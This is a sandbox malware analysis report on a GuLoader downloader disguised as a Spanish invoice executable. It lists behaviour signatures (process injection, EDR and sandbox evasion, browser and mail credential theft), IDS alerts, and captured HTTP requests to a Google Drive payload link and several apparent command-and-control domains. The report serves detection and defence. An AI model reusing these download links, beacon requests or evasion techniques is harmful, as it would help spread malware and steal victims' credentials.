Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
FACTURA A-7507_H1758.exe

Overview

General Information

Sample name:FACTURA A-7507_H1758.exe
Analysis ID:1540403
MD5:1595b77a26b3343c46fc12fc8ccdce82
SHA1:415dd7002ea68c75d88dac10c54ba115fa73776b
SHA256:f58da2ed79308a85d7f82d865dcc6ed12b0fe9f654fc28afcdd344761935495e
Infos:

Detection

GuLoader
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64native
  • FACTURA A-7507_H1758.exe (PID: 1940 cmdline: "C:\Users\user\Desktop\FACTURA A-7507_H1758.exe" MD5: 1595B77A26B3343C46FC12FC8CCDCE82)
    • FACTURA A-7507_H1758.exe (PID: 3320 cmdline: "C:\Users\user\Desktop\FACTURA A-7507_H1758.exe" MD5: 1595B77A26B3343C46FC12FC8CCDCE82)
      • vCWtwarpbXUl.exe (PID: 1628 cmdline: "C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • ROUTE.EXE (PID: 6164 cmdline: "C:\Windows\SysWOW64\ROUTE.EXE" MD5: C563191ED28A926BCFDB1071374575F1)
          • vCWtwarpbXUl.exe (PID: 5492 cmdline: "C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 6596 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: FA9F4FC5D7ECAB5A20BF7A9D1251C851)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
SourceRuleDescriptionAuthorStrings
00000000.00000002.26333481443.00000000047A5000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    No Sigma rule has matched
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-23T18:52:50.053174+020028032702Potentially Bad Traffic192.168.11.2049790142.250.80.110443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-23T18:53:27.587484+020028554651A Network Trojan was detected192.168.11.204979262.149.128.4580TCP
    2024-10-23T18:53:50.892144+020028554651A Network Trojan was detected192.168.11.204979613.248.169.4880TCP
    2024-10-23T18:54:04.433105+020028554651A Network Trojan was detected192.168.11.2049800162.0.231.20380TCP
    2024-10-23T18:54:17.741445+020028554651A Network Trojan was detected192.168.11.20498043.33.130.19080TCP
    2024-10-23T18:54:31.293807+020028554651A Network Trojan was detected192.168.11.2049808162.241.63.7780TCP
    2024-10-23T18:54:49.965592+020028554651A Network Trojan was detected192.168.11.2049812185.134.245.11380TCP
    2024-10-23T18:55:03.422881+020028554651A Network Trojan was detected192.168.11.2049816172.67.148.13380TCP
    2024-10-23T18:55:19.657726+020028554651A Network Trojan was detected192.168.11.20498203.33.130.19080TCP
    2024-10-23T18:55:39.987989+020028554651A Network Trojan was detected192.168.11.20498243.33.130.19080TCP
    2024-10-23T18:55:54.297714+020028554651A Network Trojan was detected192.168.11.204982884.32.84.3280TCP
    2024-10-23T18:56:07.689775+020028554651A Network Trojan was detected192.168.11.204983275.2.19.6280TCP
    2024-10-23T18:56:21.046825+020028554651A Network Trojan was detected192.168.11.2049836172.67.177.22080TCP
    2024-10-23T18:56:34.711326+020028554651A Network Trojan was detected192.168.11.2049840104.21.64.12480TCP
    2024-10-23T18:56:48.032751+020028554651A Network Trojan was detected192.168.11.2049844142.251.40.24380TCP
    2024-10-23T18:57:02.529322+020028554651A Network Trojan was detected192.168.11.2049848194.58.112.17480TCP
    2024-10-23T18:57:16.002328+020028554651A Network Trojan was detected192.168.11.204985213.248.169.4880TCP
    2024-10-23T18:57:24.477655+020028554651A Network Trojan was detected192.168.11.204985362.149.128.4580TCP
    2024-10-23T18:57:37.623172+020028554651A Network Trojan was detected192.168.11.204985713.248.169.4880TCP
    2024-10-23T18:57:51.034736+020028554651A Network Trojan was detected192.168.11.2049861162.0.231.20380TCP
    2024-10-23T18:58:05.193260+020028554651A Network Trojan was detected192.168.11.20498653.33.130.19080TCP
    2024-10-23T18:58:18.604684+020028554651A Network Trojan was detected192.168.11.2049869162.241.63.7780TCP
    2024-10-23T18:58:37.166871+020028554651A Network Trojan was detected192.168.11.2049873185.134.245.11380TCP
    2024-10-23T18:58:50.496361+020028554651A Network Trojan was detected192.168.11.2049877172.67.148.13380TCP
    2024-10-23T18:59:06.546231+020028554651A Network Trojan was detected192.168.11.20498813.33.130.19080TCP
    2024-10-23T19:00:19.713956+020028554651A Network Trojan was detected192.168.11.20498853.33.130.19080TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-23T18:51:19.383533+020028554641A Network Trojan was detected192.168.11.204982784.32.84.3280TCP
    2024-10-23T18:51:19.383533+020028554641A Network Trojan was detected192.168.11.204982684.32.84.3280TCP
    2024-10-23T18:51:19.383533+020028554641A Network Trojan was detected192.168.11.204985113.248.169.4880TCP
    2024-10-23T18:51:19.383533+020028554641A Network Trojan was detected192.168.11.204982584.32.84.3280TCP
    2024-10-23T18:51:19.383533+020028554641A Network Trojan was detected192.168.11.204985613.248.169.4880TCP
    2024-10-23T18:51:19.383533+020028554641A Network Trojan was detected192.168.11.204979513.248.169.4880TCP
    2024-10-23T18:53:42.971637+020028554641A Network Trojan was detected192.168.11.204979313.248.169.4880TCP
    2024-10-23T18:53:45.609684+020028554641A Network Trojan was detected192.168.11.204979413.248.169.4880TCP
    2024-10-23T18:53:57.676301+020028554641A Network Trojan was detected192.168.11.2049797162.0.231.20380TCP
    2024-10-23T18:54:00.237051+020028554641A Network Trojan was detected192.168.11.2049798162.0.231.20380TCP
    2024-10-23T18:54:02.607980+020028554641A Network Trojan was detected192.168.11.2049799162.0.231.20380TCP
    2024-10-23T18:54:09.821854+020028554641A Network Trojan was detected192.168.11.20498013.33.130.19080TCP
    2024-10-23T18:54:12.462609+020028554641A Network Trojan was detected192.168.11.20498023.33.130.19080TCP
    2024-10-23T18:54:15.101866+020028554641A Network Trojan was detected192.168.11.20498033.33.130.19080TCP
    2024-10-23T18:54:23.267014+020028554641A Network Trojan was detected192.168.11.2049805162.241.63.7780TCP
    2024-10-23T18:54:25.913453+020028554641A Network Trojan was detected192.168.11.2049806162.241.63.7780TCP
    2024-10-23T18:54:28.584202+020028554641A Network Trojan was detected192.168.11.2049807162.241.63.7780TCP
    2024-10-23T18:54:41.785148+020028554641A Network Trojan was detected192.168.11.2049809185.134.245.11380TCP
    2024-10-23T18:54:44.531622+020028554641A Network Trojan was detected192.168.11.2049810185.134.245.11380TCP
    2024-10-23T18:54:47.254941+020028554641A Network Trojan was detected192.168.11.2049811185.134.245.11380TCP
    2024-10-23T18:54:55.538176+020028554641A Network Trojan was detected192.168.11.2049813172.67.148.13380TCP
    2024-10-23T18:54:58.170346+020028554641A Network Trojan was detected192.168.11.2049814172.67.148.13380TCP
    2024-10-23T18:55:00.799106+020028554641A Network Trojan was detected192.168.11.2049815172.67.148.13380TCP
    2024-10-23T18:55:08.801289+020028554641A Network Trojan was detected192.168.11.20498173.33.130.19080TCP
    2024-10-23T18:55:11.433913+020028554641A Network Trojan was detected192.168.11.20498183.33.130.19080TCP
    2024-10-23T18:55:14.079310+020028554641A Network Trojan was detected192.168.11.20498193.33.130.19080TCP
    2024-10-23T18:55:25.031464+020028554641A Network Trojan was detected192.168.11.20498213.33.130.19080TCP
    2024-10-23T18:55:27.664048+020028554641A Network Trojan was detected192.168.11.20498223.33.130.19080TCP
    2024-10-23T18:55:30.305888+020028554641A Network Trojan was detected192.168.11.20498233.33.130.19080TCP
    2024-10-23T18:55:59.813650+020028554641A Network Trojan was detected192.168.11.204982975.2.19.6280TCP
    2024-10-23T18:56:02.436659+020028554641A Network Trojan was detected192.168.11.204983075.2.19.6280TCP
    2024-10-23T18:56:05.067883+020028554641A Network Trojan was detected192.168.11.204983175.2.19.6280TCP
    2024-10-23T18:56:13.195147+020028554641A Network Trojan was detected192.168.11.2049833172.67.177.22080TCP
    2024-10-23T18:56:15.820761+020028554641A Network Trojan was detected192.168.11.2049834172.67.177.22080TCP
    2024-10-23T18:56:18.430226+020028554641A Network Trojan was detected192.168.11.2049835172.67.177.22080TCP
    2024-10-23T18:56:26.822030+020028554641A Network Trojan was detected192.168.11.2049837104.21.64.12480TCP
    2024-10-23T18:56:29.477516+020028554641A Network Trojan was detected192.168.11.2049838104.21.64.12480TCP
    2024-10-23T18:56:32.102884+020028554641A Network Trojan was detected192.168.11.2049839104.21.64.12480TCP
    2024-10-23T18:56:40.179763+020028554641A Network Trojan was detected192.168.11.2049841142.251.40.24380TCP
    2024-10-23T18:56:42.823665+020028554641A Network Trojan was detected192.168.11.2049842142.251.40.24380TCP
    2024-10-23T18:56:45.463629+020028554641A Network Trojan was detected192.168.11.2049843142.251.40.24380TCP
    2024-10-23T18:56:54.192355+020028554641A Network Trojan was detected192.168.11.2049845194.58.112.17480TCP
    2024-10-23T18:56:57.541462+020028554641A Network Trojan was detected192.168.11.2049846194.58.112.17480TCP
    2024-10-23T18:56:59.772431+020028554641A Network Trojan was detected192.168.11.2049847194.58.112.17480TCP
    2024-10-23T18:57:08.084013+020028554641A Network Trojan was detected192.168.11.204984913.248.169.4880TCP
    2024-10-23T18:57:10.725195+020028554641A Network Trojan was detected192.168.11.204985013.248.169.4880TCP
    2024-10-23T18:57:29.702585+020028554641A Network Trojan was detected192.168.11.204985413.248.169.4880TCP
    2024-10-23T18:57:32.344731+020028554641A Network Trojan was detected192.168.11.204985513.248.169.4880TCP
    2024-10-23T18:57:42.986321+020028554641A Network Trojan was detected192.168.11.2049858162.0.231.20380TCP
    2024-10-23T18:57:45.658257+020028554641A Network Trojan was detected192.168.11.2049859162.0.231.20380TCP
    2024-10-23T18:57:48.352990+020028554641A Network Trojan was detected192.168.11.2049860162.0.231.20380TCP
    2024-10-23T18:57:56.259506+020028554641A Network Trojan was detected192.168.11.20498623.33.130.19080TCP
    2024-10-23T18:57:58.902428+020028554641A Network Trojan was detected192.168.11.20498633.33.130.19080TCP
    2024-10-23T18:58:02.443439+020028554641A Network Trojan was detected192.168.11.20498643.33.130.19080TCP
    2024-10-23T18:58:10.525554+020028554641A Network Trojan was detected192.168.11.2049866162.241.63.7780TCP
    2024-10-23T18:58:13.196161+020028554641A Network Trojan was detected192.168.11.2049867162.241.63.7780TCP
    2024-10-23T18:58:15.813986+020028554641A Network Trojan was detected192.168.11.2049868162.241.63.7780TCP
    2024-10-23T18:58:28.972554+020028554641A Network Trojan was detected192.168.11.2049870185.134.245.11380TCP
    2024-10-23T18:58:31.708352+020028554641A Network Trojan was detected192.168.11.2049871185.134.245.11380TCP
    2024-10-23T18:58:34.443490+020028554641A Network Trojan was detected192.168.11.2049872185.134.245.11380TCP
    2024-10-23T18:58:42.608482+020028554641A Network Trojan was detected192.168.11.2049874172.67.148.13380TCP
    2024-10-23T18:58:45.272826+020028554641A Network Trojan was detected192.168.11.2049875172.67.148.13380TCP
    2024-10-23T18:58:47.875961+020028554641A Network Trojan was detected192.168.11.2049876172.67.148.13380TCP
    2024-10-23T18:58:56.612400+020028554641A Network Trojan was detected192.168.11.20498783.33.130.19080TCP
    2024-10-23T18:58:58.355482+020028554641A Network Trojan was detected192.168.11.20498793.33.130.19080TCP
    2024-10-23T18:59:00.996705+020028554641A Network Trojan was detected192.168.11.20498803.33.130.19080TCP
    2024-10-23T18:59:11.781952+020028554641A Network Trojan was detected192.168.11.20498823.33.130.19080TCP
    2024-10-23T18:59:14.417558+020028554641A Network Trojan was detected192.168.11.20498833.33.130.19080TCP
    2024-10-23T18:59:17.961772+020028554641A Network Trojan was detected192.168.11.20498843.33.130.19080TCP

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: FACTURA A-7507_H1758.exeReversingLabs: Detection: 36%
    Source: FACTURA A-7507_H1758.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
    Source: unknownHTTPS traffic detected: 142.250.80.110:443 -> 192.168.11.20:49790 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 142.250.176.193:443 -> 192.168.11.20:49791 version: TLS 1.2
    Source: FACTURA A-7507_H1758.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: Binary string: route.pdb source: FACTURA A-7507_H1758.exe, 00000002.00000002.26711858259.0000000004F51000.00000004.00000020.00020000.00000000.sdmp, vCWtwarpbXUl.exe, 00000003.00000003.29557511884.0000000000EAB000.00000004.00000001.00020000.00000000.sdmp
    Source: Binary string: mshtml.pdb source: FACTURA A-7507_H1758.exe, 00000002.00000001.26330069368.0000000000649000.00000020.00000001.01000000.00000005.sdmp
    Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: vCWtwarpbXUl.exe, 00000003.00000002.30689807826.000000000077E000.00000002.00000001.01000000.00000008.sdmp, vCWtwarpbXUl.exe, 00000005.00000000.26765175851.000000000077E000.00000002.00000001.01000000.00000008.sdmp
    Source: Binary string: wntdll.pdbUGP source: FACTURA A-7507_H1758.exe, 00000002.00000003.26611799696.0000000035098000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000003.26615161368.000000003524F000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 00000004.00000003.26700487716.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000004.00000003.26703715181.000000000327C000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000004.00000002.30462678996.0000000003430000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 00000004.00000002.30462678996.000000000355D000.00000040.00001000.00020000.00000000.sdmp
    Source: Binary string: wntdll.pdb source: FACTURA A-7507_H1758.exe, FACTURA A-7507_H1758.exe, 00000002.00000003.26611799696.0000000035098000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000003.26615161368.000000003524F000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, ROUTE.EXE, 00000004.00000003.26700487716.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000004.00000003.26703715181.000000000327C000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000004.00000002.30462678996.0000000003430000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 00000004.00000002.30462678996.000000000355D000.00000040.00001000.00020000.00000000.sdmp
    Source: Binary string: mshtml.pdbUGP source: FACTURA A-7507_H1758.exe, 00000002.00000001.26330069368.0000000000649000.00000020.00000001.01000000.00000005.sdmp
    Source: Binary string: route.pdbGCTL source: FACTURA A-7507_H1758.exe, 00000002.00000002.26711858259.0000000004F51000.00000004.00000020.00020000.00000000.sdmp, vCWtwarpbXUl.exe, 00000003.00000003.29557511884.0000000000EAB000.00000004.00000001.00020000.00000000.sdmp
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 0_2_0040596F CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_0040596F
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 0_2_004064C1 FindFirstFileW,FindClose,0_2_004064C1
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4x nop then mov ebx, 00000004h4_2_033104E8

    Networking

    barindex
    Source: DNS query: www.ruarlo.xyz
    Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
    Source: Joe Sandbox ViewIP Address: 84.32.84.32 84.32.84.32
    Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49790 -> 142.250.80.110:443
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=18R_I2LlsbLnU2tcUkX6lpHGt7UzbGPbM HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /download?id=18R_I2LlsbLnU2tcUkX6lpHGt7UzbGPbM&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /pv6s/?2rul-=X8hwKmufpxNrBOZ4UI9uvOrgRNyZ3XXX9OcroS+CBDl0e/03G6vIGgM2DOx4ZCTRM54bCOA7z+XcSGAiseRvin1n9lPpnkGa0LOYYd0oIGRqFGq723QGUcE=&Hh=g6BlO HTTP/1.1Host: www.caprinaday.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
    Source: global trafficHTTP traffic detected: GET /7eim/?2rul-=Pu7Jmzu3dQpG1gjbkb05SIIv4sqt6U0nt6quxZgneXVsMN0V8VG/l4BYXcWzXHwprF18XqOi0/cpvqPHAvGxgIKtLyR40JNs4fmKbw9/FUzj8MMoXx+V66E=&Hh=g6BlO HTTP/1.1Host: www.how2.guruAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
    Source: global trafficHTTP traffic detected: GET /443n/?Hh=g6BlO&2rul-=SBUFO7UKbQxT/A0NMCw1slRydQol8mxlPD8CditPqx9i+IWA5JxkazMedHBluKiV/JkaYuM+MOSFojVsVdVmUJrzgHDhlyielwZPRH6/6joZww29waA6pwk= HTTP/1.1Host: www.ruarlo.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
    Source: global trafficHTTP traffic detected: GET /2x6z/?2rul-=6sUeAEt7hwY4mk3wpk1Py+KddqTXyA2z81hHBbMDWhxhb4pP2P0Gx/EyI5FOCEXJglbHzptctb6mG5kRkjGOyZ0rCKBl8OBndjuiy8rVGEQrWogyvOe1wlI=&Hh=g6BlO HTTP/1.1Host: www.refs4refs.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
    Source: global trafficHTTP traffic detected: GET /65n9/?Hh=g6BlO&2rul-=ssXOrmKN3jSGgEpB8/Lr5wdtJLPOH5LoJxs9XTE68ACf17BnujIswIsld3byg7BhPFUAfPirzvQjQ8endFGhd5eV2I8oMWmFKGMjxKhm0/w9bVWL9pUke2g= HTTP/1.1Host: www.estrela-b.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
    Source: global trafficHTTP traffic detected: GET /13t3/?2rul-=OPGGyibZykz1HQ+fwNDr+1YpMJUD6qxq+hpAjJgj1ZR94MAkLt42BGXqMjTev/m9FIbjW4eTPcRZap/xAhCWotsEASV9n/5Kf2dVcxkz55MgVuVRQ72L8tA=&Hh=g6BlO HTTP/1.1Host: www.russe-trykk.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
    Source: global trafficHTTP traffic detected: GET /u1q9/?Hh=g6BlO&2rul-=jd3Av2k5V8Eau16mgcfaPd8VebuAL1FcJ0MaInc68HOQ7ZBrvq4ejSFdl4VVlO0+8Eq38X9/B8LMXqH/bNKlbEK/GZjnRsE0t8/pdXuVmtOQpH7wXf7Q+zg= HTTP/1.1Host: www.1-mine.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
    Source: global trafficHTTP traffic detected: GET /e0v8/?2rul-=BRLKzowcHpFkwiCaHOnpSWjmXz6pRQQbl5LLjDqiFhfX4i3Xo6uolyXZn4m1rAB7uwEzOtHNU3mZLRFYJya+3dmXpK/KMeaogPo3NqnUjbhI+XHqg4485wo=&Hh=g6BlO HTTP/1.1Host: www.binacamasala.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
    Source: global trafficHTTP traffic detected: GET /n7zc/?Hh=g6BlO&2rul-=4uIsvpMyaiNaEMynSWraJ/2ewRneyY2IM3xoEszCiepO+vQwtMzBLq4BvMD3ENezA07qcacnmpI/gT8KQ+99hp5F4iXZ7molM84vqZhw689aaRZynnXQiFE= HTTP/1.1Host: www.wrl-llc.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
    Source: global trafficHTTP traffic detected: GET /yzuf/?2rul-=ZsgDHK4yKF/kga3ubUsB++F7bk5VbtpSdK+jBdrvfSumqltPqrTYlvpJAqwvk8XGFPq2CREtnxkO8zvg3UxP0eeY1d9UqJAwYt3G0ZBcRQKWReWSPWriOKM=&Hh=g6BlO HTTP/1.1Host: www.xtelify.techAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
    Source: global trafficHTTP traffic detected: GET /ygv5/?Hh=g6BlO&2rul-=iXc1WEJQd/Gahx7+3W11/RKNDsT+DV4H4y6OEj3K8d5Enxayz0VfmTOd+atgJRAuX8UuGK7zkF0xfNQrHCEKQuis9q2uRBiLjPiUjFzh2kkhFDo8hKapbBo= HTTP/1.1Host: www.bigliaserramenti.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
    Source: global trafficHTTP traffic detected: GET /wjz2/?2rul-=Ze+HptNr85yw14c+us2AC2dw1a7i9e00/foFqz1kUabDhzphc/VO6YYTNbrnHL/5cJOwek587J0vYmBCPQ4ypnI0Vgcg70qX2rjEYXT5uSwLlvVTAHZgxGM=&Hh=g6BlO HTTP/1.1Host: www.theawareness.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
